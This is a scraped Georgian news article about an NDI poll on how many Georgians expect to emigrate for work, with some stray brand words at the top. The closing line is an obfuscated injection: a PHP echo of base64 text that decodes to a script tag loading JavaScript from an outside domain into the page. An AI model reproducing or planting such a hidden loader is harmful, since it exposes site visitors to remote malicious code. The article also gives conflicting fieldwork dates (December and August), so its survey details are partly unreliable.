celsiusi
ავერსი შნაიდერი

NDI-ს კვლევის დღეს გამოქვეყნებული შედეგებში დასმულ კითხვაზე - რამდენად მოსალოდნელია ან არ არის მოსალოდნელი, რომ მომდევნო 12 თვის განმავლობაში სამუშაოდ საზღვარგარეთ წახვიდეთ, გამოკითხულთა 76% აცხადებს, რომ არ არის მოსალოდნელი, 20%-ს მოლოდინი აქვს, რომ საზღვარგარეთ წავა, ხოლო 4%-ს პასუხი ამ კითხვაზე არ აქვს.

ამავე კვლევით ირკვევა, რომ თბილისის, დიდი ქალაქებისა და უმცირესობათა დასახლებების მცხოვრებთა მეოთხედს, ასევე ახალგაზრდების მესამედს ემიგრაციაში წასვლა სურს. გამოკითხვამ ცხადყო, რომ ქვეყნის დატოვებაზე კაცები უფრო ფიქრობენ, ვიდრე ქალები. ამასთან, ქართული ოცნების მხარდამჭერებთან შედარებით, ოდნავ მეტი ოპოზიციის მხარდამჭერი ამბობს, რომ ქვეყნის დატოვებაზე ფიქრობს.

ცნობისთვის: NDI იკვლევს საზოგადოებრივ აზრს, რათა დაეხმაროს დაინტერესებულ მხარეებს, გაიგონ და გადაჭრან მოქალაქეებისთვის პრობლემატური საკითხები ზუსტ, მიუკერძოებელ და სტატისტიკურად სწორ მონაცემებზე დაყრდნობით. კვლევის მიზანია, ხელი შეუწყოს ისეთი პოლიტიკისა და მმართველობის ჩამოყალიბებას, რომელიც უფრო მეტად იქნება მორგებული მოსახლეობის საჭიროებებზე.

აღნიშნული ანგარიში 3 დეკემბრიდან - 20 დეკემბრამდე ქვეყნის მასშტაბით ჩატარებულ, საქართველოს ზრდასრული მოსახლეობის წარმომადგენლობით პირისპირ გამოკითხვის შედეგებს ემყარება (ოკუპირებული ტერიტორიების გამოკლებით). აგვისტოში ჩატარებული გამოკითხვა სულ 2 519 დასრულებულ ინტერვიუს მოიცავს. საშუალო ცდომილების ზღვარი კვლევაში +/- 1,6%-ია.

NDI-ის კვლევა დიდი ბრიტანეთის მთავრობის UK aid-ის ფინანსური ხელშეწყობით ხორციელდება.

310
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");